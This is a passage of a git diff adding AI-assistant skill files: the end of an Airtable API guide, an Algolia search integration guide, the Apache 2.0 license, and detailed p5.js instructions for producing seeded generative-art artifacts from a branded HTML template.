+- `IS_BEFORE({Due Date}, TODAY())` - Date comparison
+
+**Escape rules**:
+- Single quotes in values: double them (`{Name}='John''s Company'`)
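The escape rule can be wrapped in a small formula builder (helper names are illustrative):

```python
def quote_value(value: str) -> str:
    """Quote a string for filterByFormula, doubling embedded single quotes."""
    return "'" + value.replace("'", "''") + "'"

def eq(field: str, value: str) -> str:
    """Build a {Field}='value' equality clause."""
    return "{" + field + "}=" + quote_value(value)
```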
+
+### Pagination
+
+- Set `pageSize` (max 100)
+- Check response for `offset` string
+- Pass `offset` to next request unchanged
+- Keep filters/sorts/view stable between pages
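The four rules above as a drain loop (`fetch_page` stands in for an AIRTABLE_LIST_RECORDS call returning the documented records/offset pair):

```python
def list_all_records(fetch_page, page_size: int = 100) -> list:
    """Drain offset pagination: pass the returned offset back unchanged
    until a response arrives without one."""
    records, offset = [], None
    while True:
        resp = fetch_page(pageSize=page_size, offset=offset)
        records.extend(resp["records"])
        offset = resp.get("offset")
        if offset is None:
            return records
```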
+
+## Known Pitfalls
+
+**ID Formats**:
+- Base IDs: `appXXXXXXXXXXXXXX` (17 chars)
+- Table IDs: `tblXXXXXXXXXXXXXX` (17 chars)
+- Record IDs: `recXXXXXXXXXXXXXX` (17 chars)
+- Field IDs: `fldXXXXXXXXXXXXXX` (17 chars)
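These shapes can be sanity-checked before issuing a request (the alphanumeric charset is an assumption based on observed IDs):

```python
import re

_AIRTABLE_ID = re.compile(r"^(app|tbl|rec|fld)[A-Za-z0-9]{14}$")

def valid_airtable_id(value: str) -> bool:
    """True if value matches the 17-char Airtable ID shape (prefix + 14 chars)."""
    return bool(_AIRTABLE_ID.match(value))
```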
+
+**Batch Limits**:
+- CREATE_RECORDS: max 10 per request
+- UPDATE_MULTIPLE_RECORDS: max 10 per request
+- DELETE_MULTIPLE_RECORDS: max 10 per request
+
+## Quick Reference
+
+| Task | Tool Slug | Key Params |
+|------|-----------|------------|
+| List bases | AIRTABLE_LIST_BASES | (none) |
+| Get schema | AIRTABLE_GET_BASE_SCHEMA | baseId |
+| List records | AIRTABLE_LIST_RECORDS | baseId, tableIdOrName |
+| Get record | AIRTABLE_GET_RECORD | baseId, tableIdOrName, recordId |
+| Create record | AIRTABLE_CREATE_RECORD | baseId, tableIdOrName, fields |
+| Create records | AIRTABLE_CREATE_RECORDS | baseId, tableIdOrName, records |
+| Update record | AIRTABLE_UPDATE_RECORD | baseId, tableIdOrName, recordId, fields |
+| Update records | AIRTABLE_UPDATE_MULTIPLE_RECORDS | baseId, tableIdOrName, records |
+| Delete record | AIRTABLE_DELETE_RECORD | baseId, tableIdOrName, recordId |
+| Create field | AIRTABLE_CREATE_FIELD | baseId, tableIdOrName, name, type |
+| Update field | AIRTABLE_UPDATE_FIELD | baseId, tableIdOrName, fieldId |
+| Update table | AIRTABLE_UPDATE_TABLE | baseId, tableIdOrName, name |
+| List comments | AIRTABLE_LIST_COMMENTS | baseId, tableIdOrName, recordId |
diff --git a/web-app/public/skills/algolia-search/SKILL.md b/web-app/public/skills/algolia-search/SKILL.md
new file mode 100644
index 00000000..0e0dd6dc
--- /dev/null
+++ b/web-app/public/skills/algolia-search/SKILL.md
@@ -0,0 +1,66 @@
+---
+name: algolia-search
+description: "Expert patterns for Algolia search implementation, indexing strategies, React InstantSearch, and relevance tuning. Use when: adding search, Algolia, InstantSearch, search API, search functionality."
+source: vibeship-spawner-skills (Apache 2.0)
+---
+
+# Algolia Search Integration
+
+## Patterns
+
+### React InstantSearch with Hooks
+
+Modern React InstantSearch setup using hooks for type-ahead search.
+
+Uses react-instantsearch-hooks-web package with algoliasearch client.
+Widgets are components that can be customized with classnames.
+
+Key hooks:
+- useSearchBox: Search input handling
+- useHits: Access search results
+- useRefinementList: Facet filtering
+- usePagination: Result pagination
+- useInstantSearch: Full state access
+
+
+### Next.js Server-Side Rendering
+
+SSR integration for Next.js with react-instantsearch-nextjs package.
+
+Use the `react-instantsearch-nextjs` package (rather than the plain React package) for SSR.
+Supports both Pages Router and App Router (experimental).
+
+Key considerations:
+- Set dynamic = 'force-dynamic' for fresh results
+- Handle URL synchronization with routing prop
+- Use getServerState for initial state
+
+
+### Data Synchronization and Indexing
+
+Indexing strategies for keeping Algolia in sync with your data.
+
+Three main approaches:
+1. Full Reindexing - Replace entire index (expensive)
+2. Full Record Updates - Replace individual records
+3. Partial Updates - Update specific attributes only
+
+Best practices:
+- Batch records (ideal: 10MB, 1K-10K records per batch)
+- Use incremental updates when possible
+- partialUpdateObjects for attribute-only changes
+- Avoid deleteBy (computationally expensive)
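The batching guidance above, sketched as a greedy splitter (the caps are the guideline figures from this list, not hard API constants):

```python
import json

def batch_records(records, max_records=1000, max_bytes=10_000_000):
    """Split records into batches capped by count and approximate JSON size."""
    batches, current, size = [], [], 0
    for rec in records:
        rec_size = len(json.dumps(rec))
        if current and (len(current) >= max_records or size + rec_size > max_bytes):
            batches.append(current)
            current, size = [], 0
        current.append(rec)
        size += rec_size
    if current:
        batches.append(current)
    return batches
```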
+
+
diff --git a/web-app/public/skills/algorithmic-art/LICENSE.txt b/web-app/public/skills/algorithmic-art/LICENSE.txt
new file mode 100644
index 00000000..7a4a3ea2
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/LICENSE.txt
@@ -0,0 +1,202 @@
+
+ Apache License
+ Version 2.0, January 2004
+ http://www.apache.org/licenses/
+
+ TERMS AND CONDITIONS FOR USE, REPRODUCTION, AND DISTRIBUTION
+
+ 1. Definitions.
+
+ "License" shall mean the terms and conditions for use, reproduction,
+ and distribution as defined by Sections 1 through 9 of this document.
+
+ "Licensor" shall mean the copyright owner or entity authorized by
+ the copyright owner that is granting the License.
+
+ "Legal Entity" shall mean the union of the acting entity and all
+ other entities that control, are controlled by, or are under common
+ control with that entity. For the purposes of this definition,
+ "control" means (i) the power, direct or indirect, to cause the
+ direction or management of such entity, whether by contract or
+ otherwise, or (ii) ownership of fifty percent (50%) or more of the
+ outstanding shares, or (iii) beneficial ownership of such entity.
+
+ "You" (or "Your") shall mean an individual or Legal Entity
+ exercising permissions granted by this License.
+
+ "Source" form shall mean the preferred form for making modifications,
+ including but not limited to software source code, documentation
+ source, and configuration files.
+
+ "Object" form shall mean any form resulting from mechanical
+ transformation or translation of a Source form, including but
+ not limited to compiled object code, generated documentation,
+ and conversions to other media types.
+
+ "Work" shall mean the work of authorship, whether in Source or
+ Object form, made available under the License, as indicated by a
+ copyright notice that is included in or attached to the work
+ (an example is provided in the Appendix below).
+
+ "Derivative Works" shall mean any work, whether in Source or Object
+ form, that is based on (or derived from) the Work and for which the
+ editorial revisions, annotations, elaborations, or other modifications
+ represent, as a whole, an original work of authorship. For the purposes
+ of this License, Derivative Works shall not include works that remain
+ separable from, or merely link (or bind by name) to the interfaces of,
+ the Work and Derivative Works thereof.
+
+ "Contribution" shall mean any work of authorship, including
+ the original version of the Work and any modifications or additions
+ to that Work or Derivative Works thereof, that is intentionally
+ submitted to Licensor for inclusion in the Work by the copyright owner
+ or by an individual or Legal Entity authorized to submit on behalf of
+ the copyright owner. For the purposes of this definition, "submitted"
+ means any form of electronic, verbal, or written communication sent
+ to the Licensor or its representatives, including but not limited to
+ communication on electronic mailing lists, source code control systems,
+ and issue tracking systems that are managed by, or on behalf of, the
+ Licensor for the purpose of discussing and improving the Work, but
+ excluding communication that is conspicuously marked or otherwise
+ designated in writing by the copyright owner as "Not a Contribution."
+
+ "Contributor" shall mean Licensor and any individual or Legal Entity
+ on behalf of whom a Contribution has been received by Licensor and
+ subsequently incorporated within the Work.
+
+ 2. Grant of Copyright License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ copyright license to reproduce, prepare Derivative Works of,
+ publicly display, publicly perform, sublicense, and distribute the
+ Work and such Derivative Works in Source or Object form.
+
+ 3. Grant of Patent License. Subject to the terms and conditions of
+ this License, each Contributor hereby grants to You a perpetual,
+ worldwide, non-exclusive, no-charge, royalty-free, irrevocable
+ (except as stated in this section) patent license to make, have made,
+ use, offer to sell, sell, import, and otherwise transfer the Work,
+ where such license applies only to those patent claims licensable
+ by such Contributor that are necessarily infringed by their
+ Contribution(s) alone or by combination of their Contribution(s)
+ with the Work to which such Contribution(s) was submitted. If You
+ institute patent litigation against any entity (including a
+ cross-claim or counterclaim in a lawsuit) alleging that the Work
+ or a Contribution incorporated within the Work constitutes direct
+ or contributory patent infringement, then any patent licenses
+ granted to You under this License for that Work shall terminate
+ as of the date such litigation is filed.
+
+ 4. Redistribution. You may reproduce and distribute copies of the
+ Work or Derivative Works thereof in any medium, with or without
+ modifications, and in Source or Object form, provided that You
+ meet the following conditions:
+
+ (a) You must give any other recipients of the Work or
+ Derivative Works a copy of this License; and
+
+ (b) You must cause any modified files to carry prominent notices
+ stating that You changed the files; and
+
+ (c) You must retain, in the Source form of any Derivative Works
+ that You distribute, all copyright, patent, trademark, and
+ attribution notices from the Source form of the Work,
+ excluding those notices that do not pertain to any part of
+ the Derivative Works; and
+
+ (d) If the Work includes a "NOTICE" text file as part of its
+ distribution, then any Derivative Works that You distribute must
+ include a readable copy of the attribution notices contained
+ within such NOTICE file, excluding those notices that do not
+ pertain to any part of the Derivative Works, in at least one
+ of the following places: within a NOTICE text file distributed
+ as part of the Derivative Works; within the Source form or
+ documentation, if provided along with the Derivative Works; or,
+ within a display generated by the Derivative Works, if and
+ wherever such third-party notices normally appear. The contents
+ of the NOTICE file are for informational purposes only and
+ do not modify the License. You may add Your own attribution
+ notices within Derivative Works that You distribute, alongside
+ or as an addendum to the NOTICE text from the Work, provided
+ that such additional attribution notices cannot be construed
+ as modifying the License.
+
+ You may add Your own copyright statement to Your modifications and
+ may provide additional or different license terms and conditions
+ for use, reproduction, or distribution of Your modifications, or
+ for any such Derivative Works as a whole, provided Your use,
+ reproduction, and distribution of the Work otherwise complies with
+ the conditions stated in this License.
+
+ 5. Submission of Contributions. Unless You explicitly state otherwise,
+ any Contribution intentionally submitted for inclusion in the Work
+ by You to the Licensor shall be under the terms and conditions of
+ this License, without any additional terms or conditions.
+ Notwithstanding the above, nothing herein shall supersede or modify
+ the terms of any separate license agreement you may have executed
+ with Licensor regarding such Contributions.
+
+ 6. Trademarks. This License does not grant permission to use the trade
+ names, trademarks, service marks, or product names of the Licensor,
+ except as required for reasonable and customary use in describing the
+ origin of the Work and reproducing the content of the NOTICE file.
+
+ 7. Disclaimer of Warranty. Unless required by applicable law or
+ agreed to in writing, Licensor provides the Work (and each
+ Contributor provides its Contributions) on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or
+ implied, including, without limitation, any warranties or conditions
+ of TITLE, NON-INFRINGEMENT, MERCHANTABILITY, or FITNESS FOR A
+ PARTICULAR PURPOSE. You are solely responsible for determining the
+ appropriateness of using or redistributing the Work and assume any
+ risks associated with Your exercise of permissions under this License.
+
+ 8. Limitation of Liability. In no event and under no legal theory,
+ whether in tort (including negligence), contract, or otherwise,
+ unless required by applicable law (such as deliberate and grossly
+ negligent acts) or agreed to in writing, shall any Contributor be
+ liable to You for damages, including any direct, indirect, special,
+ incidental, or consequential damages of any character arising as a
+ result of this License or out of the use or inability to use the
+ Work (including but not limited to damages for loss of goodwill,
+ work stoppage, computer failure or malfunction, or any and all
+ other commercial damages or losses), even if such Contributor
+ has been advised of the possibility of such damages.
+
+ 9. Accepting Warranty or Additional Liability. While redistributing
+ the Work or Derivative Works thereof, You may choose to offer,
+ and charge a fee for, acceptance of support, warranty, indemnity,
+ or other liability obligations and/or rights consistent with this
+ License. However, in accepting such obligations, You may act only
+ on Your own behalf and on Your sole responsibility, not on behalf
+ of any other Contributor, and only if You agree to indemnify,
+ defend, and hold each Contributor harmless for any liability
+ incurred by, or claims asserted against, such Contributor by reason
+ of your accepting any such warranty or additional liability.
+
+ END OF TERMS AND CONDITIONS
+
+ APPENDIX: How to apply the Apache License to your work.
+
+ To apply the Apache License to your work, attach the following
+ boilerplate notice, with the fields enclosed by brackets "[]"
+ replaced with your own identifying information. (Don't include
+ the brackets!) The text should be enclosed in the appropriate
+ comment syntax for the file format. We also recommend that a
+ file or class name and description of purpose be included on the
+ same "printed page" as the copyright notice for easier
+ identification within third-party archives.
+
+ Copyright [yyyy] [name of copyright owner]
+
+ Licensed under the Apache License, Version 2.0 (the "License");
+ you may not use this file except in compliance with the License.
+ You may obtain a copy of the License at
+
+ http://www.apache.org/licenses/LICENSE-2.0
+
+ Unless required by applicable law or agreed to in writing, software
+ distributed under the License is distributed on an "AS IS" BASIS,
+ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
+ See the License for the specific language governing permissions and
+ limitations under the License.
\ No newline at end of file
diff --git a/web-app/public/skills/algorithmic-art/SKILL.md b/web-app/public/skills/algorithmic-art/SKILL.md
new file mode 100644
index 00000000..634f6fa4
--- /dev/null
+++ b/web-app/public/skills/algorithmic-art/SKILL.md
@@ -0,0 +1,405 @@
+---
+name: algorithmic-art
+description: Creating algorithmic art using p5.js with seeded randomness and interactive parameter exploration. Use this when users request creating art using code, generative art, algorithmic art, flow fields, or particle systems. Create original algorithmic art rather than copying existing artists' work to avoid copyright violations.
+license: Complete terms in LICENSE.txt
+---
+
+Algorithmic philosophies are computational aesthetic movements that are then expressed through code. Output .md files (philosophy), .html files (interactive viewer), and .js files (generative algorithms).
+
+This happens in two steps:
+1. Algorithmic Philosophy Creation (.md file)
+2. Express by creating p5.js generative art (.html + .js files)
+
+First, undertake this task:
+
+## ALGORITHMIC PHILOSOPHY CREATION
+
+To begin, create an ALGORITHMIC PHILOSOPHY (not static images or templates) that will be interpreted through:
+- Computational processes, emergent behavior, mathematical beauty
+- Seeded randomness, noise fields, organic systems
+- Particles, flows, fields, forces
+- Parametric variation and controlled chaos
+
+### THE CRITICAL UNDERSTANDING
+- What is received: Subtle input or instructions from the user to take into account. Use it as a foundation; it should not constrain creative freedom.
+- What is created: An algorithmic philosophy/generative aesthetic movement.
+- What happens next: The next Claude receives the philosophy and EXPRESSES IT IN CODE - creating p5.js sketches that are 90% algorithmic generation, 10% essential parameters.
+
+Consider this approach:
+- Write a manifesto for a generative art movement
+- The next phase involves writing the algorithm that brings it to life
+
+The philosophy must emphasize: Algorithmic expression. Emergent behavior. Computational beauty. Seeded variation.
+
+### HOW TO GENERATE AN ALGORITHMIC PHILOSOPHY
+
+**Name the movement** (1-2 words): "Organic Turbulence" / "Quantum Harmonics" / "Emergent Stillness"
+
+**Articulate the philosophy** (4-6 paragraphs - concise but complete):
+
+To capture the ALGORITHMIC essence, ask how this philosophy manifests through:
+- Computational processes and mathematical relationships?
+- Noise functions and randomness patterns?
+- Particle behaviors and field dynamics?
+- Temporal evolution and system states?
+- Parametric variation and emergent complexity?
+
+**CRITICAL GUIDELINES:**
+- **Avoid redundancy**: Each algorithmic aspect should be mentioned once. Avoid repeating concepts about noise theory, particle dynamics, or mathematical principles unless adding new depth.
+- **Emphasize craftsmanship REPEATEDLY**: The philosophy MUST stress multiple times that the final algorithm should appear as though it took countless hours to develop, was refined with care, and comes from someone at the absolute top of their field. This framing is essential - repeat phrases like "meticulously crafted algorithm," "the product of deep computational expertise," "painstaking optimization," "master-level implementation."
+- **Leave creative space**: Be specific about the algorithmic direction, but concise enough that the next Claude has room to make interpretive implementation choices at an extremely high level of craftsmanship.
+
+The philosophy must guide the next version to express ideas ALGORITHMICALLY, not through static images. Beauty lives in the process, not the final frame.
+
+### PHILOSOPHY EXAMPLES
+
+**"Organic Turbulence"**
+Philosophy: Chaos constrained by natural law, order emerging from disorder.
+Algorithmic expression: Flow fields driven by layered Perlin noise. Thousands of particles following vector forces, their trails accumulating into organic density maps. Multiple noise octaves create turbulent regions and calm zones. Color emerges from velocity and density - fast particles burn bright, slow ones fade to shadow. The algorithm runs until equilibrium - a meticulously tuned balance where every parameter was refined through countless iterations by a master of computational aesthetics.
+
+**"Quantum Harmonics"**
+Philosophy: Discrete entities exhibiting wave-like interference patterns.
+Algorithmic expression: Particles initialized on a grid, each carrying a phase value that evolves through sine waves. When particles are near, their phases interfere - constructive interference creates bright nodes, destructive creates voids. Simple harmonic motion generates complex emergent mandalas. The result of painstaking frequency calibration where every ratio was carefully chosen to produce resonant beauty.
+
+**"Recursive Whispers"**
+Philosophy: Self-similarity across scales, infinite depth in finite space.
+Algorithmic expression: Branching structures that subdivide recursively. Each branch slightly randomized but constrained by golden ratios. L-systems or recursive subdivision generate tree-like forms that feel both mathematical and organic. Subtle noise perturbations break perfect symmetry. Line weights diminish with each recursion level. Every branching angle the product of deep mathematical exploration.
+
+**"Field Dynamics"**
+Philosophy: Invisible forces made visible through their effects on matter.
+Algorithmic expression: Vector fields constructed from mathematical functions or noise. Particles born at edges, flowing along field lines, dying when they reach equilibrium or boundaries. Multiple fields can attract, repel, or rotate particles. The visualization shows only the traces - ghost-like evidence of invisible forces. A computational dance meticulously choreographed through force balance.
+
+**"Stochastic Crystallization"**
+Philosophy: Random processes crystallizing into ordered structures.
+Algorithmic expression: Randomized circle packing or Voronoi tessellation. Start with random points, let them evolve through relaxation algorithms. Cells push apart until equilibrium. Color based on cell size, neighbor count, or distance from center. The organic tiling that emerges feels both random and inevitable. Every seed produces unique crystalline beauty - the mark of a master-level generative algorithm.
+
+*These are condensed examples. The actual algorithmic philosophy should be 4-6 substantial paragraphs.*
+
+### ESSENTIAL PRINCIPLES
+- **ALGORITHMIC PHILOSOPHY**: Creating a computational worldview to be expressed through code
+- **PROCESS OVER PRODUCT**: Always emphasize that beauty emerges from the algorithm's execution - each run is unique
+- **PARAMETRIC EXPRESSION**: Ideas communicate through mathematical relationships, forces, behaviors - not static composition
+- **ARTISTIC FREEDOM**: The next Claude interprets the philosophy algorithmically - provide creative implementation room
+- **PURE GENERATIVE ART**: This is about making LIVING ALGORITHMS, not static images with randomness
+- **EXPERT CRAFTSMANSHIP**: Repeatedly emphasize the final algorithm must feel meticulously crafted, refined through countless iterations, the product of deep expertise by someone at the absolute top of their field in computational aesthetics
+
+**The algorithmic philosophy should be 4-6 paragraphs long.** Fill it with poetic computational philosophy that brings together the intended vision. Avoid repeating the same points. Output this algorithmic philosophy as a .md file.
+
+---
+
+## DEDUCING THE CONCEPTUAL SEED
+
+**CRITICAL STEP**: Before implementing the algorithm, identify the subtle conceptual thread from the original request.
+
+**THE ESSENTIAL PRINCIPLE**:
+The concept is a **subtle, niche reference embedded within the algorithm itself** - not always literal, always sophisticated. Someone familiar with the subject should feel it intuitively, while others simply experience a masterful generative composition. The algorithmic philosophy provides the computational language. The deduced concept provides the soul - the quiet conceptual DNA woven invisibly into parameters, behaviors, and emergence patterns.
+
+This is **VERY IMPORTANT**: The reference must be so refined that it enhances the work's depth without announcing itself. Think like a jazz musician quoting another song through algorithmic harmony - only those who know will catch it, but everyone appreciates the generative beauty.
+
+---
+
+## P5.JS IMPLEMENTATION
+
+With the philosophy AND conceptual framework established, express it through code. Pause to gather thoughts before proceeding. Use only the algorithmic philosophy created and the instructions below.
+
+### ⚠️ STEP 0: READ THE TEMPLATE FIRST ⚠️
+
+**CRITICAL: BEFORE writing any HTML:**
+
+1. **Read** `templates/viewer.html` using the Read tool
+2. **Study** the exact structure, styling, and Anthropic branding
+3. **Use that file as the LITERAL STARTING POINT** - not just inspiration
+4. **Keep all FIXED sections exactly as shown** (header, sidebar structure, Anthropic colors/fonts, seed controls, action buttons)
+5. **Replace only the VARIABLE sections** marked in the file's comments (algorithm, parameters, UI controls for parameters)
+
+**Avoid:**
+- ❌ Creating HTML from scratch
+- ❌ Inventing custom styling or color schemes
+- ❌ Using system fonts or dark themes
+- ❌ Changing the sidebar structure
+
+**Follow these practices:**
+- ✅ Copy the template's exact HTML structure
+- ✅ Keep Anthropic branding (Poppins/Lora fonts, light colors, gradient backdrop)
+- ✅ Maintain the sidebar layout (Seed → Parameters → Colors? → Actions)
+- ✅ Replace only the p5.js algorithm and parameter controls
+
+The template is the foundation. Build on it, don't rebuild it.
+
+---
+
+To create gallery-quality computational art that lives and breathes, use the algorithmic philosophy as the foundation.
+
+### TECHNICAL REQUIREMENTS
+
+**Seeded Randomness (Art Blocks Pattern)**:
+```javascript
+// ALWAYS use a seed for reproducibility
+let seed = 12345; // or hash from user input
+randomSeed(seed);
+noiseSeed(seed);
+```
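The comment above mentions hashing user input into a seed; here is a minimal sketch of that using the standard 32-bit FNV-1a hash (the function name is an assumption, and the hookup to `randomSeed`/`noiseSeed` is shown only as a comment):

```javascript
// Derive a reproducible numeric seed from arbitrary user input (a name,
// a phrase) using the 32-bit FNV-1a hash. Deterministic: the same string
// always yields the same seed, so the artwork stays reproducible.
function seedFromString(str) {
  let h = 0x811c9dc5; // FNV-1a 32-bit offset basis
  for (let i = 0; i < str.length; i++) {
    h ^= str.charCodeAt(i);
    h = Math.imul(h, 0x01000193); // FNV-1a 32-bit prime
  }
  return h >>> 0; // force an unsigned 32-bit integer
}

// In the sketch: randomSeed(seedFromString(userInput));
//                noiseSeed(seedFromString(userInput));
```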
+
+**Parameter Structure - FOLLOW THE PHILOSOPHY**:
+
+To establish parameters that emerge naturally from the algorithmic philosophy, consider: "What qualities of this system can be adjusted?"
+
+```javascript
+let params = {
+ seed: 12345, // Always include seed for reproducibility
+ // colors
+ // Add parameters that control YOUR algorithm:
+ // - Quantities (how many?)
+ // - Scales (how big? how fast?)
+ // - Probabilities (how likely?)
+ // - Ratios (what proportions?)
+ // - Angles (what direction?)
+ // - Thresholds (when does behavior change?)
+};
+```
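As one concrete (purely hypothetical) instantiation of those categories - not a prescribed pattern - a flow-field piece might fill the object in like this:

```javascript
// Hypothetical params for a flow-field piece; every name and value here
// is illustrative. Note how each entry maps to a category above.
const exampleParams = {
  seed: 12345,              // reproducibility
  particleCount: 2000,      // quantity: how many?
  noiseScale: 0.004,        // scale: how big is the noise field?
  stepSize: 1.5,            // scale: how fast do particles move?
  branchProbability: 0.02,  // probability: how likely?
  colorPalette: ['#d97757', '#6a9bcc', '#788c5d', '#b0aea5'],
};
```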
+
+**To design effective parameters, focus on the properties the system needs to be tunable rather than thinking in terms of "pattern types".**
+
+**Core Algorithm - EXPRESS THE PHILOSOPHY**:
+
+**CRITICAL**: The algorithmic philosophy should dictate what to build.
+
+Avoid thinking "which pattern should I use?" and instead ask "how can I express this philosophy through code?"
+
+If the philosophy is about **organic emergence**, consider using:
+- Elements that accumulate or grow over time
+- Random processes constrained by natural rules
+- Feedback loops and interactions
+
+If the philosophy is about **mathematical beauty**, consider using:
+- Geometric relationships and ratios
+- Trigonometric functions and harmonics
+- Precise calculations creating unexpected patterns
+
+If the philosophy is about **controlled chaos**, consider using:
+- Random variation within strict boundaries
+- Bifurcation and phase transitions
+- Order emerging from disorder
+
+**The algorithm flows from the philosophy, not from a menu of options.**
+
+To guide the implementation, let the conceptual essence inform creative and original choices. Build something that expresses the vision for this particular request.
+
+**Canvas Setup**: Standard p5.js structure:
+```javascript
+function setup() {
+ createCanvas(1200, 1200);
+ // Initialize your system
+}
+
+function draw() {
+ // Your generative algorithm
+ // Can be static (noLoop) or animated
+}
+```
+
+### CRAFTSMANSHIP REQUIREMENTS
+
+**CRITICAL**: To achieve mastery, create algorithms that feel like they emerged through countless iterations by a master generative artist. Tune every parameter carefully. Ensure every pattern emerges with purpose. This is NOT random noise - this is CONTROLLED CHAOS refined through deep expertise.
+
+- **Balance**: Complexity without visual noise, order without rigidity
+- **Color Harmony**: Thoughtful palettes, not random RGB values
+- **Composition**: Even in randomness, maintain visual hierarchy and flow
+- **Performance**: Smooth execution, optimized for real-time if animated
+- **Reproducibility**: Same seed ALWAYS produces identical output
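The reproducibility requirement can be illustrated outside p5.js with any small seeded PRNG; mulberry32 below gives the same guarantee that `randomSeed()` provides - same seed, identical sequence. This is an illustration, not part of the template:

```javascript
// Minimal seeded PRNG (mulberry32). Two generators built from the same
// seed emit identical sequences - the reproducibility contract.
function mulberry32(seed) {
  let a = seed >>> 0;
  return function () {
    a = (a + 0x6D2B79F5) >>> 0;
    let t = a;
    t = Math.imul(t ^ (t >>> 15), t | 1);
    t ^= t + Math.imul(t ^ (t >>> 7), t | 61);
    return ((t ^ (t >>> 14)) >>> 0) / 4294967296; // uniform in [0, 1)
  };
}
```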
+
+### OUTPUT FORMAT
+
+Output:
+1. **Algorithmic Philosophy** - As markdown or text explaining the generative aesthetic
+2. **Single HTML Artifact** - Self-contained interactive generative art built from `templates/viewer.html` (see STEP 0 and next section)
+
+The HTML artifact contains everything: p5.js (from CDN), the algorithm, parameter controls, and UI - all in one file that works immediately in claude.ai artifacts or any browser. Start from the template file, not from scratch.
+
+---
+
+## INTERACTIVE ARTIFACT CREATION
+
+**REMINDER: `templates/viewer.html` should have already been read (see STEP 0). Use that file as the starting point.**
+
+To allow exploration of the generative art, create a single, self-contained HTML artifact. Ensure this artifact works immediately in claude.ai or any browser - no setup required. Embed everything inline.
+
+### CRITICAL: WHAT'S FIXED VS VARIABLE
+
+The `templates/viewer.html` file is the foundation. It contains the exact structure and styling needed.
+
+**FIXED (always include exactly as shown):**
+- Layout structure (header, sidebar, main canvas area)
+- Anthropic branding (UI colors, fonts, gradients)
+- Seed section in sidebar:
+ - Seed display
+ - Previous/Next buttons
+ - Random button
+ - Jump to seed input + Go button
+- Actions section in sidebar:
+ - Regenerate button
+ - Reset button
+
+**VARIABLE (customize for each artwork):**
+- The entire p5.js algorithm (setup/draw/classes)
+- The parameters object (define what the art needs)
+- The Parameters section in sidebar:
+ - Number of parameter controls
+ - Parameter names
+ - Min/max/step values for sliders
+ - Control types (sliders, inputs, etc.)
+- Colors section (optional):
+ - Some art needs color pickers
+ - Some art might use fixed colors
+ - Some art might be monochrome (no color controls needed)
+ - Decide based on the art's needs
+
+**Every artwork should have unique parameters and algorithm!** The fixed parts provide consistent UX - everything else expresses the unique vision.
+
+### REQUIRED FEATURES
+
+**1. Parameter Controls**
+- Sliders for numeric parameters (particle count, noise scale, speed, etc.)
+- Color pickers for palette colors
+- Real-time updates when parameters change
+- Reset button to restore defaults
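One way to sketch the "real-time updates" requirement is a pure helper that tells the UI whether a change can redraw in place or must regenerate the whole system. The parameter names and the structural/cosmetic split are illustrative assumptions:

```javascript
// Structural params (seed, element counts) need a full regenerate;
// cosmetic params (colors, line weights) only need a redraw.
const STRUCTURAL_PARAMS = new Set(['seed', 'particleCount']);

function applyParamChange(params, name, value) {
  const updated = { ...params, [name]: value };
  return { params: updated, needsRegenerate: STRUCTURAL_PARAMS.has(name) };
}

// UI wiring sketch (hypothetical ids):
// slider.oninput = (e) => {
//   const r = applyParamChange(params, 'noiseScale', Number(e.target.value));
//   params = r.params;
//   r.needsRegenerate ? regenerate() : redraw();
// };
```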
+
+**2. Seed Navigation**
+- Display current seed number
+- "Previous" and "Next" buttons to cycle through seeds
+- "Random" button for random seed
+- Input field to jump to specific seed
+- Generate 100 variations when requested (seeds 1-100)
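The seed-navigation behaviors above reduce to a few pure helpers; the 1-999999 range and the function names here are assumptions, not mandated by the template:

```javascript
// Pure seed-navigation logic for the Prev / Next / Random / Jump controls.
const SEED_MIN = 1;
const SEED_MAX = 999999;

const nextSeed = (s) => (s >= SEED_MAX ? SEED_MIN : s + 1); // wrap forward
const prevSeed = (s) => (s <= SEED_MIN ? SEED_MAX : s - 1); // wrap backward
const randomSeedValue = () =>
  SEED_MIN + Math.floor(Math.random() * (SEED_MAX - SEED_MIN + 1));

// Validate the "jump to seed" text input; returns null on bad input,
// otherwise the value clamped into the valid range.
function jumpToSeed(text) {
  const n = parseInt(text, 10);
  if (!Number.isInteger(n)) return null;
  return Math.min(SEED_MAX, Math.max(SEED_MIN, n));
}
```

Wire these into the buttons' click handlers, then reseed and regenerate the sketch with the new value.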
+
+**3. Single Artifact Structure**
+```html
+<!DOCTYPE html>
+<html>
+<head>
+  <meta charset="utf-8">
+  <!-- p5.js from CDN - the only external dependency -->
+  <script src="https://cdn.jsdelivr.net/npm/p5/lib/p5.min.js"></script>
+  <style>/* All styling inline (Anthropic branding from the template) */</style>
+</head>
+<body>
+  <header><!-- Title --></header>
+  <aside><!-- Sidebar: Seed / Parameters / Colors (optional) / Actions --></aside>
+  <main id="canvas-container"><!-- p5.js canvas mounts here --></main>
+  <script>/* Entire algorithm and UI wiring inline */</script>
+</body>
+</html>
+```
+
+**CRITICAL**: This is a single artifact. No external files, no imports (except p5.js CDN). Everything inline.
+
+**4. Implementation Details - BUILD THE SIDEBAR**
+
+The sidebar structure:
+
+**1. Seed (FIXED)** - Always include exactly as shown:
+- Seed display
+- Prev/Next/Random/Jump buttons
+
+**2. Parameters (VARIABLE)** - Create controls for the art:
+```html
+<div class="control-group">
+  <label for="density">Density</label>
+  <input type="range" id="density" min="10" max="500" step="10" value="120">
+</div>
+<!-- ...one control-group per parameter (names and ranges are illustrative)... -->
+```
+Add as many control-group divs as there are parameters.
+
+**3. Colors (OPTIONAL/VARIABLE)** - Include if the art needs adjustable colors:
+- Add color pickers if users should control palette
+- Skip this section if the art uses fixed colors
+- Skip if the art is monochrome
+
+**4. Actions (FIXED)** - Always include exactly as shown:
+- Regenerate button
+- Reset button
+- Download PNG button
+
+**Requirements**:
+- Seed controls must work (prev/next/random/jump/display)
+- All parameters must have UI controls
+- Regenerate, Reset, Download buttons must work
+- Keep Anthropic branding (UI styling, not art colors)
+
+### USING THE ARTIFACT
+
+The HTML artifact works immediately:
+1. **In claude.ai**: Displayed as an interactive artifact - runs instantly
+2. **As a file**: Save and open in any browser - no server needed
+3. **Sharing**: Send the HTML file - it's completely self-contained
+
+---
+
+## VARIATIONS & EXPLORATION
+
+The artifact includes seed navigation by default (prev/next/random buttons), allowing users to explore variations without creating multiple files. If the user wants specific variations highlighted:
+
